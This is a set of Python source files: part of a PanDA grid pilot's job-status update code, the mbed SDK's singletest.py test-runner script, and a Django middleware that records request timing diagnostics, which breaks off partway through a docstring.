        tolog("Trying alternative location: %s" % (_filename))
    if os.path.exists(_filename):
        # Now check the version
        try:
            f = open(_filename, 'r')
        except Exception as e:
            tolog("!!WARNING!!2233!! Could not open %s: %s" % (_filename, e))
        else:
            # Now verify that the version is at least 1.0.0
            from json import load
            try:
                try:
                    jobReport_dict = load(f)
                    version = jobReport_dict['reportVersion']
                except Exception as e:
                    filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
                    tolog("reportVersion not found in jobReport, using default metadata XML file")
                else:
                    v = '1.0.0'
                    if self.isAGreaterOrEqualToB(version, v):
                        tolog("Will send metadata file %s since version %s is >= %s" % (_filename, version, v))
                        filenamePayloadMetadata = _filename
                    else:
                        filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
                        tolog('Metadata version in file %s is too old (%s < %s), will send old XML file %s' % \
                              (os.path.basename(_filename), version, v, os.path.basename(filenamePayloadMetadata)))
            finally:
                # bug fix: the original implementation never closed this handle
                f.close()
    else:
        # Use default metadata file
        tolog("Did not find %s" % (_filename))
        filenamePayloadMetadata = "%s/metadata-%s.xml.PAYLOAD" % (workdir, jobId)
    # Make sure the metadata file actually exists
    if os.path.exists(filenamePayloadMetadata):
        tolog("Verified existance of metadata file: %s" % (filenamePayloadMetadata))
    else:
        tolog("WARNING: metadata file does not exist: %s" % (filenamePayloadMetadata))
        tolog("Looking for it in the pilot init dir..")
        fname = os.path.basename(filenamePayloadMetadata)
        path = os.path.join(self.__pilot_initdir, fname)
        if os.path.exists(path):
            filenamePayloadMetadata = path
            tolog("Verified existance of metadata file: %s" % (filenamePayloadMetadata))
    return filenamePayloadMetadata
def updatePandaServer(self, job, site, workerNode, port, xmlstr=None, spaceReport=False, log=None, ra=0, jr=False, useCoPilot=False, stdout_tail="", stdout_path="", additionalMetadata=None):
    """
    Update the job status with the jobdispatcher web server.

    State is a tuple of (jobId, ["jobstatus", transExitCode, pilotErrorCode], timestamp)
    log = log extracts
    xmlstr is set in postJobTask for finished jobs (all files). Failed jobs will only send xml for log (created in this function)
    jr = job recovery mode
    ra = recovery attempt number (stored in the job state file)
    useCoPilot = keep initial CERNVM jobs in holding state for the Co-Pilot

    :return: (exit code, node structure); exit code 0 means the dispatcher
             accepted the update, (1, None) signals a failed HTTP update
    """
    tolog("Updating job status in updatePandaServer(): PandaId=%s, result=%s, time=%s" % (job.getState()))
    # set any holding job to failed for sites that do not use job recovery (e.g. sites with LSF, that immediately
    # removes any work directory after the LSF job finishes which of course makes job recovery impossible)
    if not self.__jobrec:
        if job.result[0] == 'holding' and site.sitename != "CERNVM":
            job.result[0] = 'failed'
            tolog("This site does not support job recovery: HOLDING state reset to FAILED")
    # note: any changed job state above will be lost for fake server updates, does it matter?
    # get the node structure expected by the server
    node = self.getNodeStructure(job, site, workerNode, spaceReport=spaceReport, log=log)
    # skip the server update (e.g. on NG)
    if not self.__updateServer:
        tolog("(fake server update)")
        return 0, node
    # get the xml
    node['xml'] = self.getXML(job, site.sitename, site.workdir, xmlstr=xmlstr, jr=jr)
    # stdout tail in case job.debug == 'true'
    if job.debug and stdout_tail != "":
        # protection for potentially large tails
        stdout_tail = stdout_tail[-2048:]
        node['stdout'] = stdout_tail
        tolog("Will send stdout tail:\n%s (length = %d)" % (stdout_tail, len(stdout_tail)))
        # also send the full stdout to a text indexer if required
        if stdout_path != "":
            if "stdout_to_text_indexer" in readpar('catchall') and os.path.exists(stdout_path):
                tolog("Will send payload stdout to text indexer")
                # get the user name, which we will use to create a proper filename
                from SiteMover import SiteMover
                s = SiteMover()
                username = s.extractUsername(job.prodUserID)
                # get setup path for xrdcp
                try:
                    si = getSiteInformation(job.experiment)
                    setup_path = si.getLocalROOTSetup()
                    filename = "PanDA_payload_stdout-%s.txt" % (job.jobId)
                    dateDirs = self.getDateDirs()
                    remotePath = os.path.join(os.path.join(username, dateDirs), filename)
                    url = "root://faxbox.mwt2.org//group/logs/pilot/%s" % (remotePath)
                    cmd = "%sxrdcp -f %s %s" % (setup_path, stdout_path, url)
                    tolog("Executing command: %s" % (cmd))
                    rc, rs = getstatusoutput(cmd)
                    tolog("rc=%d, rs=%s" % (rc, rs))
                except Exception as e:
                    tolog("!!WARNING!!3322!! Failed with text indexer: %s" % (e))
        else:
            tolog("stdout_path not set")
    else:
        if not job.debug:
            tolog("Stdout tail will not be sent (debug=False)")
        elif stdout_tail == "":
            tolog("Stdout tail will not be sent (no stdout tail)")
        else:
            tolog("Stdout tail will not be sent (debug=%s, stdout_tail=\'%s\')" % (str(job.debug), stdout_tail))
    # PN fake lostheartbeat
    # if job.result[0] == "finished":
    #     node['state'] = "holding"
    #     node['xml'] = ""
    # read back node['xml'] from jobState file for CERNVM
    sendXML = True
    if site.sitename == "CERNVM":
        _node = self.getNodeStructureFromFile(site.workdir, job.jobId)
        if _node:
            if 'xml' in _node:
                if _node['xml'] != "":
                    node['xml'] = _node['xml']
                    tolog("Read back metadata xml from job state file (length: %d)" % len(node['xml']))
                else:
                    tolog("No metadata xml present in current job state file (1 - pilot should not send xml at this time)")
                    sendXML = False
            else:
                tolog("No xml key in node structure")
                sendXML = False
        else:
            tolog("No metadata xml present in current job state file (2 - pilot should not send xml at this time)")
            sendXML = False
        # change the state to holding for initial CERNVM job
        if not sendXML and (job.result[0] == "finished" or job.result[0] == "failed"):
            # only set the holding state if the Co-Pilot is used
            if useCoPilot:
                job.result[0] = "holding"
                node['state'] = "holding"
    # update job state file
    _retjs = updateJobState(job, site, node, recoveryAttempt=ra)
    # is it the final update?
    if job.result[0] == 'finished' or job.result[0] == 'failed' or job.result[0] == 'holding':
        final = True
    else:
        final = False
    # send the original xml/json if it exists (end of production job, ignore for event service job)
    filenamePayloadMetadata = self.getPayloadMetadataFilename(site.workdir, job.jobId, altloc=job.workdir)
    payloadXMLProblem = False
    # backward compatibility
    try:
        eventService = job.eventService
    except:
        eventService = False
    if os.path.exists(filenamePayloadMetadata) and final:
        # get the metadata created by the payload
        payloadXML = getMetadata(site.workdir, job.jobId, athena=True, altpath=filenamePayloadMetadata)
        # add the metadata to the node
        if payloadXML != "" and payloadXML != None:
            tolog("Adding payload metadata of size %d to node dictionary (\'metaData\' field):\n%s" % (len(payloadXML), payloadXML))
            node['metaData'] = payloadXML
        else:
            pilotErrorDiag = "Empty Athena metadata in file: %s" % (filenamePayloadMetadata)
            payloadXMLProblem = True
    else:
        # athena XML should exist at the end of the job
        analyJob = isAnalysisJob(job.trf.split(",")[0])
        if job.result[0] == 'finished' and 'Install' not in site.sitename and not analyJob and 'DDM' not in site.sitename and 'test' not in site.sitename and job.prodSourceLabel != "install" and not eventService:
            pilotErrorDiag = "Metadata does not exist: %s" % (filenamePayloadMetadata)
            payloadXMLProblem = True
    # fail the job if there was a problem with the athena metadata
    # remove the comments below if a certain trf and release should be excluded from sending metadata
    # trf_exclusions = ['merge_trf.py']
    # release_exclusions = ['14.5.2.4']
    # jobAtlasRelease = getAtlasRelease(job.release)
    # if payloadXMLProblem and job.trf.split(",")[-1] not in trf_exclusions and jobAtlasRelease[-1] not in release_exclusions:
    if payloadXMLProblem:
        if job.trf == 'Archive_tf.py' or job.trf == 'Dummy_tf.py':
            tolog("Metadata does not exist because the job is an archive/dummy job")
        else:
            tolog("!!FAILED!!1300!! %s" % (pilotErrorDiag))
            job.result[0] = "failed"
            job.result[2] = self.__error.ERR_NOPAYLOADMETADATA
            if 'pilotLog' in node:
                node['pilotLog'] += "!!FAILED!!1300!! %s" % (pilotErrorDiag)
            else:
                node['pilotLog'] = "!!FAILED!!1300!! %s" % (pilotErrorDiag)
            node['pilotErrorCode'] = job.result[2]
            node['state'] = job.result[0]
    # for backward compatibility
    try:
        experiment = job.experiment
    except:
        experiment = "unknown"
    # do not make the update if Nordugrid (leave for ARC to do)
    if 'Nordugrid_pilot' in os.environ:
        if final:
            # update xml with SURLs stored in special SURL dictionary file
            if self.updateOutputFilesXMLWithSURLs4NG(experiment, site.workdir, job.jobId, job.outputFilesXML):
                tolog("Successfully added SURLs to %s" % (job.outputFilesXML))
            # update xml with SURLs stored in special SURL dictionary file
            if 'xml' in node:
                tolog("Updating node structure XML with SURLs")
                node['xml'] = updateXMLWithSURLs(experiment, node['xml'], site.workdir, job.jobId, self.__jobrec) # do not use format 'NG' here
                # was the log file transferred to an OS? check in the OS transfer dictionary
                tolog("job.logBucketID: %s" % job.logBucketID)
                if job.logBucketID != -1:
                    # get the corresponding ddm endpoint
                    si = getSiteInformation(experiment)
                    os_ddmendpoint = si.getObjectstoreDDMEndpointFromBucketID(job.logBucketID)
                    node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [os_ddmendpoint])
                else:
                    node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [None])
                tolog("Updated XML:\n%s" % (node['xml']))
            else:
                tolog("WARNING: Found no xml entry in the node structure")
            # store final node structure in pilot_initdir (will be sent to server by ARC control tower)
            self.copyNodeStruct4NG(node)
        tolog("Leaving the final update for the control tower")
        return 0, node
    # do not send xml if there was a put error during the log transfer
    _xml = None
    if final and 'xml' in node:
        # is the call to updateXMLWithSURLs() useless? already done in JobLog?
        # update xml with SURLs stored in special SURL dictionary file
        tolog("Updating node structure XML with SURLs")
        node['xml'] = updateXMLWithSURLs(experiment, node['xml'], site.workdir, job.jobId, self.__jobrec)
        # was the log file transferred to an OS? check in the OS transfer dictionary
        tolog("job.logBucketID: %s" % job.logBucketID)
        if job.logBucketID != -1:
            # get the corresponding ddm endpoint
            si = getSiteInformation(experiment)
            os_ddmendpoint = si.getObjectstoreDDMEndpointFromBucketID(job.logBucketID)
            node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [os_ddmendpoint])
        else:
            node['xml'] = updateXMLWithEndpoints(node['xml'], [job.logFile], [None])
        tolog("Updated XML:\n%s" % (node['xml']))
        # keep a copy so the xml can be restored after the HTTP update
        _xml = node['xml']
        if not isLogfileCopied(site.workdir, job.jobId):
            tolog("Pilot will not send xml about output files since log was not transferred")
            node['xml'] = ""
    # should XML be sent at this time?
    if not sendXML:
        tolog("Metadata xml will not be sent")
        if 'xml' in node:
            if node['xml'] != "":
                _xml = node['xml']
                node['xml'] = ""
    # add experiment specific metadata
    if final and additionalMetadata != None:
        tolog("Adding additionalMetadata to node")
        if 'metaData' in node:
            node['metaData'] += additionalMetadata
        else:
            node['metaData'] = additionalMetadata
    # make the PandaLogger update at the final job update
    if final:
        # do not send FAX info for overflow jobs (transferType=fax), only for failover jobs
        if job.filesWithFAX > 0 and job.transferType.lower() != "fax":
            tolog("Sending PandaLogger update")
            params = {}
            params['pid'] = job.jobId
            params['line'] = 0 # this is mandatory part of API, has to be present
            params['type'] = 'FAXrecovery'
            params['message'] = '"WithFAX":' + str(job.filesWithFAX) +\
                                ',"WithoutFAX":' + str(job.filesWithoutFAX) +\
                                ',"bytesWithFAX":' + str(job.bytesWithFAX) +\
                                ',"bytesWithoutFAX":' + str(job.bytesWithoutFAX) +\
                                ',"timeToCopy":' + job.timeStageIn
            toPandaLogger(params)
    # make the actual update, repeatedly if necessary (for the final update)
    #ret = makeHTTPUpdate(job.result[0], node, port, url=self.__pshttpurl, path=self.__pilot_initdir)
    if job.workdir.endswith("/"):
        job.workdir = job.workdir[:-1]
    ret = makeHTTPUpdate(job.result[0], node, port, url=self.__pshttpurl, path=os.path.dirname(job.workdir))
    if not ret[2]: # data is None for a failed update attempt
        tolog("makeHTTPUpdate returned: %s" % str(ret))
        return 1, None
    tolog("ret = %s" % str(ret))
    data = ret[1]
    tolog("data = %s" % str(data))
    if "command" in data:
        job.action = data['command']
    try:
        awk = data['StatusCode']
    except:
        tolog("!!WARNING!!1300!! Having problem updating job status, set the awk to 1 for now, and continue...")
        awk = "1"
    else:
        tolog("jobDispatcher acknowledged with %s" % (awk))
    # need to have a return code so subprocess knows if update goes ok or not
    ecode = int(awk) # use the awk code from jobdispatcher as the exit code
    # PN fake lostheartbeat
    # if job.result[0] == "finished":
    #     ecode = 1
    # reset xml in case it was overwritten above for failed log transfers
    if final and 'xml' in node:
        node['xml'] = _xml
    # if final update, now it's safe to remove any lingering memory output files from the init dir
    if final:
        try:
            filename = os.path.join(self.__pilot_initdir, "memory_monitor*")
            tolog("Will remove any lingering %s files from the init directory" % (filename))
            os.system("rm -rf %s" % (filename))
        except Exception as e:
            # bug fix: both values must be inside the %-tuple; the original
            # passed e as a stray second argument to tolog(), which would
            # itself have raised a TypeError inside this handler
            tolog("!!WARNING!!4343!! Failed to remove %s: %s" % (filename, e))
    return ecode, node # ecode=0 : update OK, otherwise something wrong
| |
#!/usr/bin/env python2
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.Wirkus@arm.com>
"""
"""
File format example: test_spec.json:
{
"targets": {
"KL46Z": ["ARM", "GCC_ARM"],
"LPC1768": ["ARM", "GCC_ARM", "GCC_CR", "GCC_CS", "IAR"],
"LPC11U24": ["uARM"],
"NRF51822": ["ARM"]
}
}
File format example: muts_all.json:
{
"1" : {"mcu": "LPC1768",
"port":"COM4",
"disk":"J:\\",
"peripherals": ["TMP102", "digital_loop", "port_loop", "analog_loop", "SD"]
},
"2" : {"mcu": "KL25Z",
"port":"COM7",
"disk":"G:\\",
"peripherals": ["digital_loop", "port_loop", "analog_loop"]
}
}
"""
# Be sure that the tools directory is in the search path
import sys
from os.path import join, abspath, dirname
ROOT = abspath(join(dirname(__file__), ".."))
sys.path.insert(0, ROOT)
# Check: Extra modules which are required by core test suite
from workspace_tools.utils import check_required_modules
check_required_modules(['prettytable', 'serial'])
# Imports related to mbed build api
from workspace_tools.build_api import mcu_toolchain_matrix
# Imports from TEST API
from workspace_tools.test_api import SingleTestRunner
from workspace_tools.test_api import singletest_in_cli_mode
from workspace_tools.test_api import detect_database_verbose
from workspace_tools.test_api import get_json_data_from_file
from workspace_tools.test_api import get_avail_tests_summary_table
from workspace_tools.test_api import get_default_test_options_parser
from workspace_tools.test_api import print_muts_configuration_from_json
from workspace_tools.test_api import print_test_configuration_from_json
from workspace_tools.test_api import get_autodetected_MUTS_list
from workspace_tools.test_api import get_autodetected_TEST_SPEC
from workspace_tools.test_api import get_module_avail
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
# Importing extra modules which can be not installed but if available they can extend test suite functionality
try:
import mbed_lstools
from workspace_tools.compliance.ioper_runner import IOperTestRunner
from workspace_tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
def get_version():
    """Return this test script's version as a (major, minor) tuple."""
    major, minor = 1, 5
    return (major, minor)
if __name__ == '__main__':
    # Command line options
    parser = get_default_test_options_parser()
    parser.description = """This script allows you to run mbed defined test cases for particular MCU(s) and corresponding toolchain(s)."""
    parser.epilog = """Example: singletest.py -i test_spec.json -M muts_all.json"""
    (opts, args) = parser.parse_args()
    # Print script version and exit
    if opts.version:
        print parser.description
        print parser.epilog
        print "Version %d.%d"% get_version()
        exit(0)
    # Only verify database connectivity, then exit
    if opts.db_url and opts.verbose_test_configuration_only:
        detect_database_verbose(opts.db_url)
        exit(0)
    # Print summary / information about automation test status
    if opts.test_automation_report:
        print get_avail_tests_summary_table(platform_filter=opts.general_filter_regex)
        exit(0)
    # Print per-test-case report (selected columns only)
    if opts.test_case_report:
        test_case_report_cols = ['id',
                                 'automated',
                                 'description',
                                 'peripherals',
                                 'host_test',
                                 'duration',
                                 'source_dir']
        print get_avail_tests_summary_table(cols=test_case_report_cols,
                                            result_summary=False,
                                            join_delim='\n',
                                            platform_filter=opts.general_filter_regex)
        exit(0)
    # Only prints matrix of supported toolchains
    if opts.supported_toolchains:
        print mcu_toolchain_matrix(platform_filter=opts.general_filter_regex)
        exit(0)
    # test_spec / MUTs are filled either by auto-detection (mbed-ls) below
    # or from the JSON files supplied on the command line.
    test_spec = None
    MUTs = None
    if hasattr(opts, 'auto_detect') and opts.auto_detect:
        # If auto_detect attribute is present, we assume other auto-detection
        # parameters like 'toolchains_filter' are also set.
        print "MBEDLS: Detecting connected mbed-enabled devices... "
        MUTs = get_autodetected_MUTS_list()
        for mut in MUTs.values():
            print "MBEDLS: Detected %s, port: %s, mounted: %s"% (mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu'],
                                                                 mut['port'],
                                                                 mut['disk'])
        # Set up parameters for test specification filter function (we need to set toolchains per target here)
        use_default_toolchain = 'default' in opts.toolchains_filter.split(',') if opts.toolchains_filter is not None else True
        use_supported_toolchains = 'all' in opts.toolchains_filter.split(',') if opts.toolchains_filter is not None else False
        toolchain_filter = opts.toolchains_filter
        platform_name_filter = opts.general_filter_regex.split(',') if opts.general_filter_regex is not None else opts.general_filter_regex
        # Test specification with information about each target and associated toolchain
        test_spec = get_autodetected_TEST_SPEC(MUTs.values(),
                                               use_default_toolchain=use_default_toolchain,
                                               use_supported_toolchains=use_supported_toolchains,
                                               toolchain_filter=toolchain_filter,
                                               platform_name_filter=platform_name_filter)
    else:
        # Open file with test specification
        # test_spec_filename tells script which targets and their toolchain(s)
        # should be covered by the test scenario
        test_spec = get_json_data_from_file(opts.test_spec_filename) if opts.test_spec_filename else None
        if test_spec is None:
            if not opts.test_spec_filename:
                parser.print_help()
            exit(-1)
        # Get extra MUTs if applicable
        MUTs = get_json_data_from_file(opts.muts_spec_filename) if opts.muts_spec_filename else None
        if MUTs is None:
            if not opts.muts_spec_filename:
                parser.print_help()
            exit(-1)
    # Dump the resolved configuration and exit (no tests are run)
    if opts.verbose_test_configuration_only:
        print "MUTs configuration in %s:" % ('auto-detected' if opts.auto_detect else opts.muts_spec_filename)
        if MUTs:
            print print_muts_configuration_from_json(MUTs, platform_filter=opts.general_filter_regex)
        print
        print "Test specification in %s:" % ('auto-detected' if opts.auto_detect else opts.test_spec_filename)
        if test_spec:
            print print_test_configuration_from_json(test_spec)
        exit(0)
    # Interoperability checks require the optional mbed_lstools module
    if get_module_avail('mbed_lstools'):
        if opts.operability_checks:
            # Check if test scope is valid and run tests
            test_scope = get_available_oper_test_scopes()
            if opts.operability_checks in test_scope:
                tests = IOperTestRunner(scope=opts.operability_checks)
                test_results = tests.run()
                # Export results in form of JUnit XML report to separate file
                if opts.report_junit_file_name:
                    report_exporter = ReportExporter(ResultExporterType.JUNIT_OPER)
                    report_exporter.report_to_file(test_results, opts.report_junit_file_name)
            else:
                print "Unknown interoperability test scope name: '%s'" % (opts.operability_checks)
                print "Available test scopes: %s" % (','.join(["'%s'" % n for n in test_scope]))
            exit(0)
    # Verbose test specification and MUTs configuration
    if MUTs and opts.verbose:
        print print_muts_configuration_from_json(MUTs)
    if test_spec and opts.verbose:
        print print_test_configuration_from_json(test_spec)
    if opts.only_build_tests:
        # We are skipping testing phase, and suppress summary
        opts.suppress_summary = True
    # Build the test runner from the full option set; all behaviour flags
    # are forwarded explicitly as keyword arguments.
    single_test = SingleTestRunner(_global_loops_count=opts.test_global_loops_value,
                                   _test_loops_list=opts.test_loops_list,
                                   _muts=MUTs,
                                   _clean=opts.clean,
                                   _opts_db_url=opts.db_url,
                                   _opts_log_file_name=opts.log_file_name,
                                   _opts_report_html_file_name=opts.report_html_file_name,
                                   _opts_report_junit_file_name=opts.report_junit_file_name,
                                   _opts_report_build_file_name=opts.report_build_file_name,
                                   _test_spec=test_spec,
                                   _opts_goanna_for_mbed_sdk=opts.goanna_for_mbed_sdk,
                                   _opts_goanna_for_tests=opts.goanna_for_tests,
                                   _opts_shuffle_test_order=opts.shuffle_test_order,
                                   _opts_shuffle_test_seed=opts.shuffle_test_seed,
                                   _opts_test_by_names=opts.test_by_names,
                                   _opts_peripheral_by_names=opts.peripheral_by_names,
                                   _opts_test_only_peripheral=opts.test_only_peripheral,
                                   _opts_test_only_common=opts.test_only_common,
                                   _opts_verbose_skipped_tests=opts.verbose_skipped_tests,
                                   _opts_verbose_test_result_only=opts.verbose_test_result_only,
                                   _opts_verbose=opts.verbose,
                                   _opts_firmware_global_name=opts.firmware_global_name,
                                   _opts_only_build_tests=opts.only_build_tests,
                                   _opts_parallel_test_exec=opts.parallel_test_exec,
                                   _opts_suppress_summary=opts.suppress_summary,
                                   _opts_test_x_toolchain_summary=opts.test_x_toolchain_summary,
                                   _opts_copy_method=opts.copy_method,
                                   _opts_mut_reset_type=opts.mut_reset_type,
                                   _opts_jobs=opts.jobs,
                                   _opts_waterfall_test=opts.waterfall_test,
                                   _opts_consolidate_waterfall_test=opts.consolidate_waterfall_test,
                                   _opts_extend_test_timeout=opts.extend_test_timeout,
                                   _opts_auto_detect=opts.auto_detect)
    # Runs test suite in CLI mode; exit status mirrors the suite result
    if (singletest_in_cli_mode(single_test)):
        exit(0)
    else:
        exit(-1)
| |
import sys
import os, socket, threading
import datetime, random, math
import thread
from functools import wraps
import dogslow
from celery import shared_task
from django.utils import timezone
from django.conf import settings
from django.db import models
from django.http import HttpResponse
# Pull diagnostics configuration from Django settings; fall back to the
# defaults below when DIAGNOSTICS_SETTINGS is not defined / not resolvable.
try:
    SETTINGS = settings.DIAGNOSTICS_SETTINGS
# Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are no
# longer swallowed while resolving settings.
except Exception:
    SETTINGS = {
        'USE_CELERY': False,                  # write Diagnostic rows via Celery task
        'MIDDLEWARE_SAMPLE_RATE': 0.05,       # fraction of requests that get timing rows
        'MIDDLEWARE_SLOW': 200.0,             # ms; NOTE(review): other call sites default to 25000 — confirm intent
        'MIDDLEWARE_EXCLUDED_PATHS': ('/ping.html', '/admin/'),
        'MIDDLEWARE_EXCLUDED_TYPES': ('.php',),
        'LOG_LEVEL': 0,
        'SAMPLE_RATE': 0.05,                  # sampling rate for log_diagnostic()
        'DOGSLOW': True,                      # enable slow-request watchdog snapshots
    }
class Diagnostic(models.Model):
    """One diagnostic sample: either a slow-request (watchdog) snapshot or a
    randomly sampled request/function timing, plus machine identification."""
    slow_log = models.BooleanField(default=False, db_index=True)  # True for watchdog (slow) snapshots
    middleware = models.BooleanField(default=False, db_index=True)  # True when produced by DiagnosticMiddleware
    event = models.CharField(max_length=200, blank=True, default="", db_index=True)  # request path or module name
    sub_event = models.CharField(max_length=2000, blank=True, default="")  # request params or function name
    host = models.CharField(max_length=20, null=True, blank=True, db_index=True) # host IP address
    elapsed_time = models.FloatField(default=0, db_index=True) # total time elapsed in ms
    cpu_time = models.FloatField(default=0) # CPU time used by this process in ms
    cpu_percent = models.FloatField(default=0, null=True) # overall CPU usage during this request
    process_id = models.IntegerField(default=0, db_index=True)
    thread_id = models.CharField(max_length=50, blank=True, default="", db_index=True)
    timestamp = models.DateTimeField(auto_now_add=True)
    extra = models.TextField(blank=True, default="") # other miscellaneous information
    def save(self, *args, **kwargs):
        # NOTE(review): this override adds nothing over models.Model.save;
        # presumably kept as a hook point — confirm before removing.
        super(Diagnostic, self).save(*args, **kwargs)
    def set_machine_info(self):
        """Fill process_id, thread_id and host, preserving any preset values."""
        pid, tid, host = Diagnostic.current_machine_info()
        if not self.process_id:
            self.process_id = pid
        if not self.thread_id:
            self.thread_id = tid
        if not self.host:
            self.host = host
    @staticmethod
    def current_machine_info():
        """Return (pid, current thread ident as str, this host's IP address)."""
        return os.getpid(), str(threading.current_thread().ident), socket.gethostbyname(socket.gethostname())
@shared_task
def save_diagnostic(diagnostic):
    """Persist *diagnostic*; runs as a Celery task when dispatched via .delay()
    so database writes happen off the request thread."""
    diagnostic.save()
class DiagnosticMiddleware(object):
    """
    Django middleware that records request timing diagnostics.

    Two kinds of Diagnostic rows are produced:
      * watchdog snapshots (via dogslow) of requests still running after
        MIDDLEWARE_SLOW milliseconds, and
      * randomly sampled timing rows (MIDDLEWARE_SAMPLE_RATE) written when
        the response is returned.
    """
    def __init__(self):
        # The watchdog timer only exists when DOGSLOW is enabled.  Keep an
        # explicit None so process_request/_cancel can test for it; the old
        # code raised AttributeError on every request when DOGSLOW was off.
        self.timer = None
        if SETTINGS.get('DOGSLOW', True):
            self.interval = SETTINGS.get('MIDDLEWARE_SLOW', 25000) / 1000.0
            self.timer = dogslow.timer.Timer()
            self.timer.daemon = True
            self.timer.start()
    @staticmethod
    def req_string(request):
        """Render the request as 'METHOD scheme://host/path[?query]'."""
        rs = '%s %s://%s%s' % (
            request.META.get('REQUEST_METHOD'),
            request.META.get('wsgi.url_scheme', 'http'),
            request.META.get('HTTP_HOST'),
            request.META.get('PATH_INFO'),
        )
        if request.META.get('QUERY_STRING', ''):
            rs += ('?' + request.META.get('QUERY_STRING'))
        return rs
    @staticmethod
    def peek(request, thread_id, started, event=None, sub_event=None):
        """ HT Dogslow """
        # Snapshot the watched thread's stack.  Also used by performance_log,
        # in which case `request` is the wrapped function (no META attribute)
        # and event/sub_event carry the module/function names.
        frame = sys._current_frames()[thread_id]
        header_string = event
        if hasattr(request, 'META'):
            header_string = DiagnosticMiddleware.req_string(request)
            event = request.META.get('PATH_INFO')
            sub_event = str(request.REQUEST)[:2000]
        output = dogslow.WatchdogMiddleware._compose_output(
            frame, header_string, started, thread_id)
        response_time = timezone.now() - request.start_time
        response_time_millis = response_time.seconds*1000 + response_time.microseconds/1000.0
        diagnostic = Diagnostic(
            event=event,
            extra=output,
            # BUG FIX: store the computed sub_event; the old code passed
            # `event` here, duplicating the path into both columns.
            sub_event=sub_event,
            slow_log=True,
            elapsed_time=response_time_millis,
            middleware=True,
        )
        diagnostic.set_machine_info()
        diagnostic.save()
    def _is_excluded(self, request):
        """ Returns true if the path or filetype is on the list of excluded files"""
        if any(request.META.get('PATH_INFO').endswith(ending) for
               ending in SETTINGS['MIDDLEWARE_EXCLUDED_TYPES']):
            return True
        elif any(request.META.get('PATH_INFO').startswith(path) for
                 path in SETTINGS['MIDDLEWARE_EXCLUDED_PATHS']):
            return True
        return False
    def _cancel(self, request):
        # Stop the pending watchdog callback, if one was scheduled.
        if self.timer is not None and hasattr(request, 'dogslow'):
            self.timer.cancel(request.dogslow)
            del request.dogslow
    def process_request(self, request):
        if self._is_excluded(request):
            return
        # Only schedule the slow-request watchdog when it was started in
        # __init__ (DOGSLOW enabled).
        if self.timer is not None:
            request.dogslow = self.timer.run_later(
                DiagnosticMiddleware.peek,
                self.interval,
                request,
                thread.get_ident(),
                datetime.datetime.utcnow())
        request.start_time = timezone.now()
        request.cpu_start_time = os.times()[0]
        try:
            usage = open('/proc/stat', 'r')
            request.stat_start_values = usage.readline().split(' ')
        except Exception:
            # /proc/stat unavailable (e.g. non-Linux); skip CPU% sampling.
            request.stat_start_values = None
    def process_view(self, request, view_func, view_args, view_kwargs):
        # Remember the view name so it can be stored in Diagnostic.extra.
        request.view_func_name = view_func.__name__
    def process_template_response(self, request, response):
        return response
    def process_response(self, request, response):
        self._cancel(request)
        if self._is_excluded(request):
            return response
        random_sample = (random.random() <= SETTINGS.get('MIDDLEWARE_SAMPLE_RATE', 1.0))
        if random_sample:
            response_time = timezone.now() - request.start_time
            response_time_millis = response_time.seconds*1000 + response_time.microseconds/1000.0
            cpu_time = (os.times()[0] - request.cpu_start_time) * 1000.0
            try:
                usage = open('/proc/stat', 'r')
                cur_usage = usage.readline().split(' ')
                usage_time = 0.0
                # Fields 2-4 of the first /proc/stat line: user, nice, system.
                for index in [2,3,4]:
                    usage_time += (int(cur_usage[index]) - int(request.stat_start_values[index]))
                idle_time = int(cur_usage[5]) - int(request.stat_start_values[5])
                if (usage_time + idle_time) > 0:
                    cpu_percent = float(usage_time)/float(usage_time + idle_time)
                else:
                    cpu_percent = -1.0
            except Exception:
                cpu_percent = 0.0
            diagnostic = Diagnostic(
                event=request.META.get('PATH_INFO'),
                elapsed_time=response_time_millis,
                cpu_time=cpu_time,
                cpu_percent=cpu_percent,
                sub_event=str(request.REQUEST)[:2000],
                slow_log=False,
                middleware=True,
            )
            diagnostic.set_machine_info()
            if hasattr(request, 'view_func_name'):
                diagnostic.extra = request.view_func_name
            if SETTINGS.get('USE_CELERY', False):
                save_diagnostic.delay(diagnostic)
            else:
                diagnostic.save()
        return response
    def process_exception(self, request, exception):
        # Make sure the watchdog does not fire for a request that already died.
        self._cancel(request)
@shared_task
def log_diagnostic(event="", sub_event="", elapsed_timedelta=None, host="", process_id="", thread_id="",
                   extra="", log_level=1, force=False):
    """
    Create and save a Diagnostic record with the given info, and
    return the time this was done, which can be used for future logs.

    The record is written when force is True, or when log_level passes the
    configured LOG_LEVEL and this call is picked by random sampling.
    """
    if force or (
            (log_level >= SETTINGS['LOG_LEVEL']) and
            (random.random() <= SETTINGS['SAMPLE_RATE'])):
        # Guard against the default None; previously this raised
        # AttributeError whenever a caller omitted elapsed_timedelta.
        if elapsed_timedelta is not None:
            elapsed_ms = (elapsed_timedelta.microseconds / 1000.0 +
                          elapsed_timedelta.seconds * 1000.0)
        else:
            elapsed_ms = 0.0
        diagnostic = Diagnostic(
            event=event,
            sub_event=sub_event,
            host=host,
            process_id=process_id,
            thread_id=thread_id,
            extra=extra,
            elapsed_time=elapsed_ms,
        )
        diagnostic.set_machine_info()
        if SETTINGS['USE_CELERY']:
            save_diagnostic.delay(diagnostic)
        else:
            diagnostic.save()
    return timezone.now()
def performance_log(log_level=1, slow_time=None, force=False):
    """
    Decorator factory that logs a wrapped function's wall-clock run time.

    A dogslow watchdog snapshot is scheduled so that calls still running
    after `slow_time` (or MIDDLEWARE_SLOW) seconds get their stack captured;
    on completion a Diagnostic row is written via log_diagnostic, subject to
